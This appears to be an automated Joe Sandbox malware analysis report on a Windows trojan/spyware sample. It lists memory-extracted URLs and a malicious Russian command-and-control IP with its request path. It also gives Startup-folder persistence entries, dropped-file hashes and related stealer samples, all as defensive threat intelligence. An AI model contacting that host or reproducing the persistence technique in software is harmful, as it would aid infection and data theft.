https://www.ted.com/talks/tommy_mccall_the_simple_genius_of_a_good_graphic	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000005.00000002.2230696323.00000000065D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSBuild.exe, 0000000C.00000002.2921996960.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.000000000323A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2945399112.0000000003EA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.0000000003305000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=lv&category=theme81https://myactivity.google.com/myactivity/?u	is-P8KJC.tmp.1.dr	false		high
https://aka.ms/pscore6lBkq	powershell.exe, 00000005.00000002.2220622751.0000000004B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.141.84.168:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08P	MSBuild.exe, 0000000C.00000002.2921996960.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	MSBuild.exe, 0000000C.00000002.2921996960.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.000000000323A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2945399112.0000000003EA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.0000000003305000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	dobi.exe, 00000008.00000002.2313695689.000001F718565000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2391759200.0000000004474000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000F.00000002.2653268479.0000000004BE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://w.soundcloud.com/player/?visual=true&url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F11584106	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.2220622751.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://player.vimeo.com/video/314182905?byline=0&badge=0&portrait=0&title=0	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.instagram.com/p/BSMaDhvFcFl/	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/d	MSBuild.exe, 0000000C.00000002.2921996960.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl	is-C12V6.tmp.1.dr, is-P8KJC.tmp.1.dr	false		high
https://www.youtube.com/watch?v=3FZGN7BCs6k&t=13s	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/h	MSBuild.exe, 0000000C.00000002.2921996960.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vimeo.com/316458419	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	dobi.exe, 00000008.00000002.2313695689.000001F718565000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2391759200.0000000004474000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000F.00000002.2653268479.0000000004BE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=lvCtrl$1	is-P8KJC.tmp.1.dr	false		high
https://vimeo.com/314182918	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://canva-embed.com/api/iframe?url=https%3A%2F%2Fwww.instagram.com%2Fp%2FBSMaDhvFcFl%2F%3Futm_so	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.2220622751.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/embed/3FZGN7BCs6k?rel=0&showinfo=0&start=13	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://soundcloud.com/yigitcanbal/bob-marley-dont-worry-be-happy	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.info-zip.org/	dobi.exe, 00000008.00000002.2313695689.000001F71833C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2391759200.000000000442C000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000F.00000002.2653268479.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/a/answer/9122284	is-C12V6.tmp.1.dr, is-P8KJC.tmp.1.dr	false		high
http://45.141.84.168:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08/	MSBuild.exe, 0000000C.00000002.2916287723.000000000116F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://canva-embed.com/api/iframe?url=http%3A%2F%2Fghiblipic.tumblr.com%2Fimage%2F176076545875&	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://canva-embed.com/aCl7bwm?app=1	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://static.canva.com/static/images/favicons/favicon_app_presentations.svg	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	9VbeqQbgU4.tmp, 00000001.00000002.2501521506.0000000000CEC000.00000004.00000010.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000005.00000002.2230696323.00000000065D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://vimeo.com/314182905	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://codepen.io/onion2k/embed/preview/BGrXEO?height=300&slug-hash=BGrXEO&default-tabs=html	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://open.spotify.com/embed/track/5b88tNINg4Q4nrRbrCXUmg	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 0000000C.00000002.2921996960.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.000000000323A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2945399112.0000000003EA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.0000000003305000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	9VbeqQbgU4.tmp, 00000001.00000002.2501521506.0000000000CEC000.00000004.00000010.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabS	MSBuild.exe, 0000000C.00000002.2921996960.000000000323A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.canva.com/static/images/favicons/favicon_app_sites.svg	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://static.canva.com/static/images/favicons/favicon_app_whiteboards.svg	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://int3.de/	9VbeqQbgU4.tmp, 00000001.00000002.2501521506.0000000000CEC000.00000004.00000010.00020000.00000000.sdmp	false		high
https://gfycat.com/ifr/GraveJovialChital	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://myactivity.google.com/	is-C12V6.tmp.1.dr, is-P8KJC.tmp.1.dr	false		high
https://g.live.com/odclientsettings/ProdV2	edb.log.11.dr	false		high
https://github.com/focus-trap/tabbable/blob/master/LICENSE	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://vovsoft.com/	dobi.exe, 00000008.00000002.2244640646.000001F7172FF000.00000004.00000020.00020000.00000000.sdmp, dobi.exe, 00000008.00000000.2181647992.0000000000341000.00000020.00000001.01000000.0000000A.sdmp, dobi.exe, 00000008.00000002.2244640646.000001F717BCD000.00000004.00000020.00020000.00000000.sdmp, dobi.exe, 00000008.00000000.2191379305.0000000000C39000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 0000000B.00000003.2286365154.000001EFC82DE000.00000004.00000020.00020000.00000000.sdmp, coml.exe, 0000000E.00000000.2545898832.00000000010EA000.00000020.00000001.01000000.00000011.sdmp	false		high
https://vovsoft.com/blog/credits-and-acknowledgements/H	dobi.exe, 00000008.00000002.2244640646.000001F7172FF000.00000004.00000020.00020000.00000000.sdmp, dobi.exe, 00000008.00000000.2181647992.0000000000341000.00000020.00000001.01000000.0000000A.sdmp, coml.exe, 0000000E.00000000.2545898832.00000000010EA000.00000020.00000001.01000000.00000011.sdmp	false	Avira URL Cloud: safe	unknown
https://codepen.io	9VbeqQbgU4.tmp, 00000001.00000003.2480801457.0000000005440000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MSBuild.exe, 0000000C.00000002.2921996960.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.000000000323A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2945399112.0000000003EA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.0000000003305000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2921996960.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000005.00000002.2230696323.00000000065D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromeenterprise.google/policies/#BrowserSwitcherUrlList	is-C12V6.tmp.1.dr, is-P8KJC.tmp.1.dr	false		high
https://policies.google.com/	is-C12V6.tmp.1.dr, is-P8KJC.tmp.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.141.84.168	unknown	Russian Federation		206728	MEDIALAND-ASRU	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1564404
Start date and time:	2024-11-28 09:51:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9VbeqQbgU4.exe renamed because original name is a hash value
Original Sample Name:	a91b4875630c4f702ab63f94ed633da4.exe
Detection:	MAL
Classification:	mal80.troj.spyw.evad.winEXE@20/183@0/2
EGA Information:	Successful, ratio: 40%
HCA Information:	Successful, ratio: 98% Number of executed functions: 136 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 199.232.210.172, 192.229.221.95, 13.85.23.206, 20.3.187.198
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target MSBuild.exe, PID 340 because it is empty
Execution Graph export aborted for target coml.exe, PID 4584 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1744 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: 9VbeqQbgU4.exe

Simulations

Behavior and APIs

Time	Type	Description
03:52:48	API Interceptor	41x Sleep call for process: powershell.exe modified
03:52:58	API Interceptor	1x Sleep call for process: dobi.exe modified
03:53:00	API Interceptor	2x Sleep call for process: svchost.exe modified
03:53:16	API Interceptor	1268x Sleep call for process: MSBuild.exe modified
03:53:34	API Interceptor	1x Sleep call for process: coml.exe modified
08:53:09	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2493.tmp
08:53:23	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coml.lnk

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	chutmarao.ps1	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	fpPn4XBjyk.exe	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	Banco Santander Totta - NOTIFICA#U00c7#U00c3O DE TRANSFER#U00caNCIA ELECTR#U00d3NICA.eml	Get hash	malicious	CredentialStealer	Browse	199.232.214.172
	invoice-1664809283.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	NF---710.msi	Get hash	malicious	AteraAgent	Browse	199.232.210.172
	60d3afa4-2164-7144-a69a-cb4a16ac6cd6.eml	Get hash	malicious	CredentialStealer	Browse	199.232.214.172
	file.exe	Get hash	malicious	Credential Flusher	Browse	199.232.214.172
	Demande de proposition du Accueil-Parrainage Outaouais.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	file.exe	Get hash	malicious	Credential Flusher	Browse	199.232.214.172
	file.exe	Get hash	malicious	MicroClip	Browse	199.232.214.172
s-part-0035.t-0009.t-msedge.net	DarkGate_Loader.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://public-fra.mkt.dynamics.com/api/orgs/85a8c477-bea7-ef11-8a66-0022483994f9/r/MKSqoVs73k-RUO5uHPfRswIAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fassets-fra.mkt.dynamics.com%252F85a8c477-bea7-ef11-8a66-0022483994f9%252Fdigitalassets%252Fstandaloneforms%252F46042089-b8ac-ef11-a72d-6045bd6e29e8%22%2C%22RedirectOptions%22%3A%7B%226%22%3A%22mktprf9fb729cc84d74db3bce9a30da7409e87eoprf%22%2C%221%22%3Anull%7D%7D&digest=juexwq7Jl6DCR7CneIIynCjAtNPRJ1FxLmm99rnbDLA%3D&secretVersion=02e7c83d621d4269af2f08a8e4e233cf	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://www.google.rs/url?q=160CHARtTPSJ3J3wDyycT&sa=t&esrc=TYsrCFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/aloperdehatti.com/on/wTARVgfa92/%61%6C%65%73%73%69%61%2E%64%61%6E%69%65%6C%65%40%74%6F%6E%69%6E%63%61%73%61%2E%69%74&ugs=n8CoFFz5hZ4Yaxn3ZJryvKlaQxQ-BOyvjZ0GlahI9shjnWfTZ1du_w==	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.63
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.63
	chutmarao.ps1	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	invoice-1664809283.pdf (1).js	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	invoice-1664809283.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	hotel11-27.ps1	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	remi.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	13.107.246.63
fp2e7a.wpc.phicdn.net	invoice-1664809283.pdf (1).js	Get hash	malicious	RHADAMANTHYS	Browse	192.229.221.95
	invoice-1664809283.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	192.229.221.95
	hotel11-27.ps1	Get hash	malicious	RHADAMANTHYS	Browse	192.229.221.95
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	192.229.221.95
	qABMUOvImw.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	NF---710.msi	Get hash	malicious	AteraAgent	Browse	192.229.221.95
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	192.229.221.95
	1ZFDEXA938MKSUBA.html	Get hash	malicious	WinSearchAbuse	Browse	192.229.221.95
	20241125_BAON_19xxxxxx24.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	192.229.221.95
	Tracking.js	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MEDIALAND-ASRU	SecuriteInfo.com.Win32.Malware-gen.6717.12233.exe	Get hash	malicious	RedLine, SectopRAT	Browse	45.141.86.82
	ExeFile (236).exe	Get hash	malicious	Oski	Browse	45.141.84.184
	bLNr5K5U7B.elf	Get hash	malicious	Mirai	Browse	45.141.84.241
	aqua.arm7	Get hash	malicious	Mirai	Browse	45.141.84.246
	5xPf2c2uL7.exe	Get hash	malicious	RedLine SmokeLoader	Browse	45.141.84.21
	VsaIxu42Ks.exe	Get hash	malicious	Raccoon RedLine SmokeLoader	Browse	45.141.84.21
	16vbR3UTik.exe	Get hash	malicious	Raccoon RedLine SmokeLoader	Browse	45.141.84.21
	VJHkHNoW68.exe	Get hash	malicious	Raccoon RedLine SmokeLoader	Browse	45.141.84.21
	SF45gO3Bc8.exe	Get hash	malicious	Raccoon RedLine SmokeLoader	Browse	45.141.84.21
	3B0jZOP3Ou.exe	Get hash	malicious	RedLine SmokeLoader	Browse	45.141.84.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://public-fra.mkt.dynamics.com/api/orgs/85a8c477-bea7-ef11-8a66-0022483994f9/r/MKSqoVs73k-RUO5uHPfRswIAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fassets-fra.mkt.dynamics.com%252F85a8c477-bea7-ef11-8a66-0022483994f9%252Fdigitalassets%252Fstandaloneforms%252F46042089-b8ac-ef11-a72d-6045bd6e29e8%22%2C%22RedirectOptions%22%3A%7B%226%22%3A%22mktprf9fb729cc84d74db3bce9a30da7409e87eoprf%22%2C%221%22%3Anull%7D%7D&digest=juexwq7Jl6DCR7CneIIynCjAtNPRJ1FxLmm99rnbDLA%3D&secretVersion=02e7c83d621d4269af2f08a8e4e233cf	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://www.google.rs/url?q=160CHARtTPSJ3J3wDyycT&sa=t&esrc=TYsrCFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/aloperdehatti.com/on/wTARVgfa92/%61%6C%65%73%73%69%61%2E%64%61%6E%69%65%6C%65%40%74%6F%6E%69%6E%63%61%73%61%2E%69%74&ugs=n8CoFFz5hZ4Yaxn3ZJryvKlaQxQ-BOyvjZ0GlahI9shjnWfTZ1du_w==	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.63
	https://hcm55.sapsf.eu/sf/liveprofile?company=jernimomarP2&blockId=block2109&_s.crb=USKEprAmKRumsjVSyLJPCEVj9GAzHD70l0UaoJsp%252f50%253d	Get hash	malicious	Unknown	Browse	13.107.246.63
	chutmarao.ps1	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	invoice-1664809283.pdf (1).js	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	invoice-1664809283.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	hotel11-27.ps1	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	http://www.fabribat.com/.js/	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://pixmar.co.za/.well-known/.js/	Get hash	malicious	Unknown	Browse	13.107.246.63

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Canva\d3dcompiler_47.dll (copy)	ivySCI-5.6.3.exe	Get hash	malicious	Unknown	Browse
	ivySCI-5.6.3.exe	Get hash	malicious	Unknown	Browse
	MayitaV16.exe	Get hash	malicious	Unknown	Browse
	Xa04iTOvv5.exe	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse
	ArenaWarsSetup.exe	Get hash	malicious	Unknown	Browse
	ArenaWarsSetup.exe	Get hash	malicious	Unknown	Browse
	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse
	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse
	Xeno Executor Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Users\user\AppData\Local\Temp\is-K07P7.tmp\9VbeqQbgU4.tmp
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	176670344
Entropy (8bit):	6.752951259704491
Encrypted:	false
SSDEEP:	1572864:XgRMg/aKxl4b7qCDQtjovZT78wLF2pArKgDz6ObiISXD+Dyj3eRalD2kGpTe/2Hh:ng/geeFXzGa9cz
MD5:	762DF055F5A0FCDE30E96F0D6B84D6F0
SHA1:	9F669E5FCA1AE9C2EFD505FCD80D1948B2BB79F8
SHA-256:	8C2D451098E847FA5498E3BFFC8DDF93CDBC150355A7B6568E0984568EED4FAA
SHA-512:	68107C096A6E18C0DEB68CCDB2513F47038CC618313F4E9A858DC8367D372B3EAA81973AE00385DD1E5DC542EACEC4FE695847C47E85C571E9D8AEE06E8E646D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......4.....................@.............................`.......{....`.........................................G....j..4...T....0..<W...pe...F..n...X......................................(...@o..@.......................`....................text...U2.......4.................. ..`.rdata.......P.......8..............@..@.data.....D..p ......P .............@....pdata....F..pe...F...).............@..@.gxfg....A...P...B....p.............@..@.retplne............. q..................rodata.............."q............. ..`.tls....i...........4q.............@...CPADinfo8...........:q.............@...LZMADEC.............<q............. ..`_RDATA..\............Nq.............@..@malloc_h..... .......Pq............. ..`.rsrc...<W...0...X...Rq.............@..@.reloc................x.............@..B........................................................

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.349594204864264
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrN:KooCEYhgYEL0In
MD5:	C15A7A933E9AE686C10F2136BAB6CD3A
SHA1:	0CAB50BD9320576766AB3A80A96E3D0D84B6A779
SHA-256:	0859F6E3E7FA7F9126A7DF5153C3D2F880DC8103BCD7A4A6F69CE58207D48B06
SHA-512:	7BC465E512567C3270FD7CE11186606B3AC24F64C580DEBBE2AC9CEBF1C68072E2D57DAB39ADEDF7E5DE7140C72751C013DDF2C255EC7B8FA6BBD74A9EB1412D
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1740
Entropy (8bit):	5.48038049020755
Encrypted:	false
SSDEEP:	48:LWSU4xympjmZ9tz4RIoUeNWR831NFZ9001dqr:LLHxvMZfIfjW8fS01Yr
MD5:	0B1E51B1385CBE53BAA6214C084340C9
SHA1:	B80AF02CB5C466385F64D0E97C1B90B4F56F6DEA
SHA-256:	3BFDFD6B8E52C9580E096F0D254A94C717E0AF0F094EACED9008778911AD254A
SHA-512:	57B403F5B4DEE41851AFFA440161A01C7B9FCBA9EF29C6D55E13672E183AE342E712432CDBFDB7CAC0BB1AF197C7C8D881FE6A767B41CBDFA121D68167203FDD
Malicious:	false
Preview:	@...e...........K.....................:.%............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.D....................+.H..!...e........System.Configuration.Ins

Process:	C:\Users\user\Desktop\9VbeqQbgU4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3699712
Entropy (8bit):	6.605047198768081
Encrypted:	false
SSDEEP:	98304:wJYVM+LtVt3P/KuG2ONG9iqLRQV333K0i:BVL/tnHGYiqlnt
MD5:	6AB2AF20157D2F440E8B22982F6247C5
SHA1:	53C0DA8DE2EE2C50B79913A876EDCD7078897566
SHA-256:	C95F668AB97A0C6650381E0FC1A93AA043E3F899EEF09DD7A3B0837A4298838E
SHA-512:	5ED8B96A65C44F7CAB604440F21B5E2F331C38D2E7CA3EBB26A9C1750AE5E5690225EC0F6530E6C65589DC639FCBCBF9AFA80E85881B6F731118D0089559CB6D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
